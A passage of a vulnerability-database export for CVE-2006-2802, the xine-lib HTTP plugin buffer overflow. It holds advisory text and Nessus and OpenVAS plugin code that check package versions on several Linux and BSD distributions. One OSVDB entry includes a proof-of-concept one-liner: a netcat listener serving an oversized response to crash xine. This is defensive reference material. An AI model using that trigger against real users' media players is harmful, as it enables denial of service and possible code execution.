(rpm_check(release:\"MDK2006.0\", reference:\"xine-gnomevfs-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-image-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-plugins-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-polyp-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-smb-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:06:54", "bulletinFamily": "scanner", "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.", "modified": "2018-07-20T00:00:00", "published": "2006-10-14T00:00:00", "id": "DEBIAN_DSA-1105.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22647", "title": "Debian DSA-1105-1 : xine-lib - buffer overflow", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1105. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22647);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/20 2:17:12\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"DSA\", value:\"1105\");\n\n script_name(english:\"Debian DSA-1105-1 : xine-lib - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Federico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=369876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1105\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxine packages.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.0.1-1sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libxine-dev\", reference:\"0.9.8-2woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxine0\", reference:\"0.9.8-2woody5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libxine-dev\", reference:\"1.0.1-1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libxine1\", reference:\"1.0.1-1sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:06:45", "bulletinFamily": "scanner", "description": "New xine-lib packages are available for Slackware 10.2 and -current\nto fix security issues.", "modified": "2015-03-19T00:00:00", "published": "2006-07-28T00:00:00", "id": "SLACKWARE_SSA_2006-207-04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22101", "title": "Slackware 10.2 / current : xine-lib (SSA:2006-207-04)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-207-04. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22101);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:18:22 $\");\n\n script_cve_id(\"CVE-2005-4048\", \"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"SSA\", value:\"2006-207-04\");\n\n script_name(english:\"Slackware 10.2 / current : xine-lib (SSA:2006-207-04)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New xine-lib packages are available for Slackware 10.2 and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.391759\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?380bb21c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xine-lib package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"10.2\", pkgname:\"xine-lib\", pkgver:\"1.1.2\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"xine-lib\", pkgver:\"1.1.2\", pkgarch:\"i686\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in xine-lib. The xineplug_inp_http.so library fails to properly check bounds for HTTP responses resulting in a buffer overflow. By tricking a victim into opening an HTTP link to a malicious website, an attacker can cause arbitary code execution on the victim\\'s system resulting in a loss of integrity.\n## Technical Description\nApplications that use a vulnerable version of the library may also be affected.\n## Solution Description\nUpgrade to cvs version (after 2006-05-31) or version 1.1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in xine-lib. The xineplug_inp_http.so library fails to properly check bounds for HTTP responses resulting in a buffer overflow. By tricking a victim into opening an HTTP link to a malicious website, an attacker can cause arbitary code execution on the victim\\'s system resulting in a loss of integrity.\n## Manual Testing Notes\nperl -e 'print \"A\"x\"9500\"' | nc -lp 8080\nand then open \"xine http://localhost:8080/foo.mpg\"\n## References:\nVendor URL: http://xinehq.de/\nVendor Specific Solution URL: http://sourceforge.net/mailarchive/forum.php?thread_id=11077232&forum_id=11923\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:108)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1105)\n[Vendor Specific Advisory URL](http://sourceforge.net/mailarchive/forum.php?thread_id=11076540&forum_id=7131)\n[Secunia Advisory ID:20369](https://secuniaresearch.flexerasoftware.com/advisories/20369/)\n[Secunia Advisory ID:20766](https://secuniaresearch.flexerasoftware.com/advisories/20766/)\n[Secunia Advisory ID:20828](https://secuniaresearch.flexerasoftware.com/advisories/20828/)\n[Secunia Advisory ID:20942](https://secuniaresearch.flexerasoftware.com/advisories/20942/)\n[Secunia Advisory ID:20549](https://secuniaresearch.flexerasoftware.com/advisories/20549/)\n[Secunia Advisory ID:21919](https://secuniaresearch.flexerasoftware.com/advisories/21919/)\nOther Advisory URL: http://www.securiteam.com/unixfocus/5JP0W0AIKA.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-08.xml\nOther Advisory URL: http://www.ubuntu.com/usn/usn-295-1\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1852\n[CVE-2006-2802](https://vulners.com/cve/CVE-2006-2802)\nBugtraq ID: 18187\n", "modified": "2006-05-30T10:50:10", "published": "2006-05-30T10:50:10", "href": "https://vulners.com/osvdb/OSVDB:25936", "id": "OSVDB:25936", "title": "xine-lib xineplug_inp_http.so HTTP Response Remote Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-21T00:00:00", "published": "2008-09-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56933", "id": "OPENVAS:56933", "title": "FreeBSD Ports: libxine", "type": "openvas", "sourceData": "#\n#VID 107e2ee5-f941-11da-b1fa-020039488e34\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: libxine\n\nCVE-2006-2802\nBuffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib\n1.1.1 allows remote attackers to cause a denial of service\n(application crash) via a long reply from an HTTP server, as\ndemonstrated using gxine 0.5.6.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/20369\nhttp://www.vuxml.org/freebsd/107e2ee5-f941-11da-b1fa-020039488e34.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56933);\n script_version(\"$Revision: 4125 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-21 07:39:51 +0200 (Wed, 21 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: libxine\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"libxine\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.1_6\")<0) {\n txt += 'Package libxine version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200609-08.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57886", "id": "OPENVAS:57886", "title": "Gentoo Security Advisory GLSA 200609-08 (xine-lib)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"xine-lib is vulnerable to multiple buffer overflows that could be exploited\nto execute arbitrary code.\";\ntag_solution = \"All xine-lib users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/xine-lib-1.1.2-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200609-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=133520\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200609-08.\";\n\n \n\nif(description)\n{\n script_id(57886);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2802\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200609-08 (xine-lib)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/xine-lib\", unaffected: make_list(\"ge 1.1.2-r2\"), vulnerable: make_list(\"lt 1.1.2-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update to xine-lib\nannounced via advisory DSA 1105-1.\n\nFederico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57082", "id": "OPENVAS:57082", "title": "Debian Security Advisory DSA 1105-1 (xine-lib)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1105_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1105-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.0.1-1sarge3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.1.1-2.\n\nWe recommend that you upgrade your libxine packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201105-1\";\ntag_summary = \"The remote host is missing an update to xine-lib\nannounced via advisory DSA 1105-1.\n\nFederico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.\";\n\n\nif(description)\n{\n script_id(57082);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 1105-1 (xine-lib)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"0.9.8-2woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine0\", ver:\"0.9.8-2woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.0.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.0.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.", "modified": "2018-02-03T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231057173", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057173", "title": "Slackware Advisory SSA:2006-207-04 xine-lib", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_207_04.nasl 8649 2018-02-03 12:16:43Z teissa $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New xine-lib packages are available for Slackware 10.2 and -current to\nfix security issues.\n\nEvidently there is also an issue involving AVI files which has not\nbeen issued a CVE entry.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-207-04\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57173\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:43 +0100 (Sat, 03 Feb 2018) $\");\n script_cve_id(\"CVE-2005-4048\", \"CVE-2006-2802\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8649 $\");\n name = \"Slackware Advisory SSA:2006-207-04 xine-lib \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"xine-lib\", ver:\"1.1.2-i686-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57173", "id": "OPENVAS:57173", "title": "Slackware Advisory SSA:2006-207-04 xine-lib", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_207_04.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New xine-lib packages are available for Slackware 10.2 and -current to\nfix security issues.\n\nEvidently there is also an issue involving AVI files which has not\nbeen issued a CVE entry.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-207-04\";\n \nif(description)\n{\n script_id(57173);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2005-4048\", \"CVE-2006-2802\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-207-04 xine-lib \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : 